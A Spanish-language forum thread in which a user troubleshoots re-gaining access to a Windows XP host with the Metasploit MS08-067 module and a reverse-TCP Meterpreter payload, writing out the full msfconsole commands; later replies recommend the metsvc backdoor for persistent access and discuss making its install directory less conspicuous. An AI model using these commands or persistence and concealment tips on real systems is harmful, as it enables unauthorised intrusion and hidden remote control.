Ayuda con MSF

Iniciado por CloudswX, 13 Febrero 2010, 23:45 PM

0 Miembros y 2 Visitantes están viendo este tema.

CloudswX

Duda Metasploit.

Ok gente sere breve en mi duda:

Escaneo una IP con el Nmap....

PORT    STATE SERVICE      VERSION

139/tcp open  netbios-ssn

445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds


Tiene el puerto 445 abierto (vulnerabilidad en el SMB), luego abro mi consola de MSF y....
Citarmsf> use windows/smb/ms08_067_netapi

Luego de esto elijo el PAYLOAD:
msf> use PAYLOAD windows/meterpreter/reverse_tcp

Introduzco todas las variables con el comando "set"...
set RHOST 200.xx.xx.xx
set LHOST 192.168.x.xx
set RPORT 445
set LPORT 4444
set TARGET 0


y finalmente
msf> exploit

El asunto esta en que consigo mi sesion con el meterpreter sin problema alguno, pero cuando salgo de la consola del meterpreter y posteriormente del MSF, no puedo volver a conectar con el host pues da el siguiente error:

http://picasaweb.google.com/lh/photo/i0Ya_l659UiyRlKj92MIAA?feat=directlink

Sera porque el host se queda con la sesion anterior del Meterpreter?
Y si es asi, como consigo que no me siga pasando pues la cosa esta que solo consigo entrar a la pc victima una sola vez   :-\


Post data
estas pruebas las hago en mi casa pues tengo varias pc´s que uso como conejillos de india.




«Dios no juega a los dados, usa /dev/random.»
twitter: @cloudswx

Shell Root

Tip para el MSF: Cuando consigues la session del Meterpreter, pulsando Ctrl + Z la pones a trabajar en segundo plano, despues si quieres volver a la session, bastará con correr el comando sessions -l, ver el ID de la session y despues para interactual con ella, ejecutas, sessions -i ID_Session.

Ahora con la duda que planteas, no entendí, porque no estas usando la misma IP? Como te sales de la consola del meterpreter?
Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.

[L]ord [R]NA

Cita de: cloudswx en 13 Febrero 2010, 23:45 PM
Duda Metasploit.

Ok gente sere breve en mi duda:

Escaneo una IP con el Nmap....

PORT    STATE SERVICE      VERSION

139/tcp open  netbios-ssn

445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds


Tiene el puerto 445 abierto (vulnerabilidad en el SMB), luego abro mi consola de MSF y....
Citarmsf> use windows/smb/ms08_067_netapi

Luego de esto elijo el PAYLOAD:
msf> use PAYLOAD windows/meterpreter/reverse_tcp

Introduzco todas las variables con el comando "set"...
set RHOST 200.xx.xx.xx
set LHOST 192.168.x.xx
set RPORT 445
set LPORT 4444
set TARGET 0


y finalmente
msf> exploit

El asunto esta en que consigo mi sesion con el meterpreter sin problema alguno, pero cuando salgo de la consola del meterpreter y posteriormente del MSF, no puedo volver a conectar con el host pues da el siguiente error:

http://picasaweb.google.com/lh/photo/i0Ya_l659UiyRlKj92MIAA?feat=directlink

Sera porque el host se queda con la sesion anterior del Meterpreter?
Y si es asi, como consigo que no me siga pasando pues la cosa esta que solo consigo entrar a la pc victima una sola vez   :-\


Post data
estas pruebas las hago en mi casa pues tengo varias pc´s que uso como conejillos de india.




Incluso el exploit funcionando no obtendras una sesion, en LHOST estas poniendo una IP privada mientras que con RHOST estas atacando una IP Publica (200.xxx.xxx.xxx), si funciona el exploit en ese ordenador tratara de hacer una conexion contra la ip 192.168.xxx.xxx de su red privada si esa direccion existe, de lo contrario no hara nada.

CloudswX

Pollo... Si te fijas en la imagen que esta en el link

NO ESTOY ATACANDO UNA IP PUBLICA

Cita de: cloudswx en 13 Febrero 2010, 23:45 PM
Post data
estas pruebas las hago en mi casa pues tengo varias pc´s que uso como conejillos de india.

Es decir tengo una red LAN, donde uso Ip's privadas...  Si lo dices por esto:

set RHOST 200.xx.xx.xx
set LHOST 192.168.x.xx
set RPORT 445
set LPORT 4444
set TARGET 0

Solo lo hice para ilustrar un poco que el error no estaba en una variable pendeiente de SETEAR. No son las Ip's reales.

Mira esta imagen para que las veas:
http://picasaweb.google.com/lh/photo/i0Ya_l659UiyRlKj92MIAA?feat=directlink



«Dios no juega a los dados, usa /dev/random.»
twitter: @cloudswx

ruben_linux

a mi parecer son son pocas las redes que caen en en este exploit.
esta anticuado, cualquier red del 2011 ya no tiene ese fallo
:-)

Debci

Cita de: cloudswx en 15 Febrero 2010, 14:54 PM
Pollo... Si te fijas en la imagen que esta en el link

NO ESTOY ATACANDO UNA IP PUBLICA

Es decir tengo una red LAN, donde uso Ip's privadas...  Si lo dices por esto:

set RHOST 200.xx.xx.xx
set LHOST 192.168.x.xx
set RPORT 445
set LPORT 4444
set TARGET 0

Solo lo hice para ilustrar un poco que el error no estaba en una variable pendeiente de SETEAR. No son las Ip's reales.

Mira esta imagen para que las veas:
http://picasaweb.google.com/lh/photo/i0Ya_l659UiyRlKj92MIAA?feat=directlink


Fuese como fuese, pusiste IP privada y no puedes menospreciar a otros que han intentado ayudarte, ilustrando un posible problema, tal como lo has planteado.

Saludos

CloudswX

nunca menospreciare toda la ayuda que aqui he recibido, no ha sido esa mi intencion..


«Dios no juega a los dados, usa /dev/random.»
twitter: @cloudswx

Debci

Cita de: cloudswx en 21 Marzo 2011, 02:01 AM
nunca menospreciare toda la ayuda que aqui he recibido, no ha sido esa mi intencion..
Bueno, mirate algo acerda del METSVC si aún sigues interesado, para maneter una session persistencte a pesar de que reinicie el equipo, te salgas y tal.

Backdoreando el equipo remoto

Y conectandonos al backdoor tras su instalación en el equipo remoto.

Saludos

CloudswX

Pues la verdad me parece muy util el BT de "metsvc" ya que como dices es un poco tedioso explotar la misma vulnerabilidad cada vez que queramos una shell remota. Pero el asunto de que cualquier otra persona con acceso al puerto podria utilizar mi backdoor es un factor a tomar en cuenta para los que hacemos pentest entre amigos.

y algo que me llamo la atencion y no se si se pueda modificar con las opciones dadas por 'çmetsvc  es esto:

[*] Creating a temporary installation directory C:\DOCUME~1\victim\LOCALS~1\Temp\JplTpVnksh...


ya que este crea un directorio llamado VICTIM ? NO SERA MUY OBVIO  :huh:


«Dios no juega a los dados, usa /dev/random.»
twitter: @cloudswx

Debci

Cita de: cloudswx en 22 Marzo 2011, 19:49 PM
Pues la verdad me parece muy util el BT de "metsvc" ya que como dices es un poco tedioso explotar la misma vulnerabilidad cada vez que queramos una shell remota. Pero el asunto de que cualquier otra persona con acceso al puerto podria utilizar mi backdoor es un factor a tomar en cuenta para los que hacemos pentest entre amigos.

y algo que me llamo la atencion y no se si se pueda modificar con las opciones dadas por 'çmetsvc  es esto:

[*] Creating a temporary installation directory C:\DOCUME~1\victim\LOCALS~1\Temp\JplTpVnksh...


ya que este crea un directorio llamado VICTIM ? NO SERA MUY OBVIO  :huh:
Mmm fíjate en los archivos source .rb de METSVC y fíjate si puede cambiar en alguna la ruta (haz una backup siempre por si acaso).

Saludos